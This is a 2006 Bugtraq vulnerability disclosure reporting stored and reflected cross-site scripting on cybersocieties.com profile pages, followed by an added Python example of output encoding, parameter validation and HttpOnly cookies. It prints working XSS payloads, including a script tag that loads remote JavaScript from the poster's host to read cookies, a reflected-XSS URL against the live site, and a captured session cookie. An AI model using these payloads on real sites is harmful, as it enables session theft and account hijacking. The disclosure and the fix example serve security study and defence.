Message-ID: <20060612223039.2206.qmail@securityfocus.com>
Date: 12 Jun 2006 22:30:39 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Cybersocieties.com - XSS & cookie disclosure

Cybersocieties.com

Homepage:
http://www.cybersocieties.com

Affected files:

* Input boxes in profile:
  - Full name box
  - Occupation box
  - MSN box
  - Yahoo box
  - AIM Box
* Viewing a profile

------------------------------------------------------

XSS vuln via input boxes in profile:

No filter evasion is needed. For PoC try putting the following codes in one of the boxes mentioned above:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

or:

<IMG SRC=javascript:alert('XSS')>

or:

<IMG SRC="javascript:document.write(document.cookie)">

etc

Screenshots:
http://www.youfucktard.com/xsp/cyberso1.jpg
http://www.youfucktard.com/xsp/cyberso2.jpg
http://www.youfucktard.com/xsp/cyberso3.jpg

Our Cookie:
This is remote text via xss.js located at youfucktard.com
CFTOKEN=544ABB96-138B-14A6-ADAD1496630F53D7; CFID=436305; USERID=28506

--------------------------------------------------------

Viewing a profile XSS vuln PoC:

http://www.cybersocieties.com/index.cfm?fractal=bsw.dsp.home.main&UserID=28506&tab=3">">">">">'><SCRIPT></SCRIPT><BR><BR><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<""><"<'

Screenshot:
http://www.youfucktard.com/xsp/cyberso4.jpg
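
The three server-side controls that close the issues reported above, as an added example that is not part of the original post and is not the site's code: output-encoding stored profile fields, strict validation of the numeric `tab` parameter, and an HttpOnly session cookie. Python stands in for the site's server-side language; all function names, the 1 to 10 range for `tab`, and the cookie value are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Inputs taken from the post: a profile field value, and a shortened
# form of the tab= value from the "viewing a profile" URL.
ADVISORY_FIELD_VALUE = "<IMG SRC=javascript:alert('XSS')>"
ADVISORY_TAB_VALUE = "3\">'><SCRIPT></SCRIPT>"


def render_profile_field(label: str, value: str) -> str:
    """Encode a stored profile value before placing it in HTML.

    quote=True also encodes " and ', so the value stays inert inside a
    quoted attribute as well as in the element body.
    """
    safe = html.escape(value, quote=True)
    return f'<td title="{safe}">{html.escape(label)}: {safe}</td>'


def parse_int_param(raw: str, lo: int, hi: int) -> int:
    """Accept a numeric query parameter only if it is ASCII digits in range.

    Rejecting the request is safer than echoing a cleaned-up value back.
    """
    if not raw.isascii() or not raw.isdigit():
        raise ValueError("non-numeric parameter rejected")
    number = int(raw)
    if not lo <= number <= hi:
        raise ValueError("parameter out of range")
    return number


def session_cookie_header(name: str, value: str) -> str:
    """Build a Set-Cookie value that page script cannot read."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["httponly"] = True   # hidden from document.cookie
    cookie[name]["secure"] = True     # sent over HTTPS only
    cookie[name]["path"] = "/"
    return cookie[name].OutputString()


if __name__ == "__main__":
    print(render_profile_field("Occupation", ADVISORY_FIELD_VALUE))
    try:
        parse_int_param(ADVISORY_TAB_VALUE, 1, 10)
    except ValueError as exc:
        print("tab rejected:", exc)
    print("Set-Cookie:", session_cookie_header("CFID", "constructed-value"))
```

HttpOnly only limits what an injected script can read; the encoding and validation steps are what remove the injection itself.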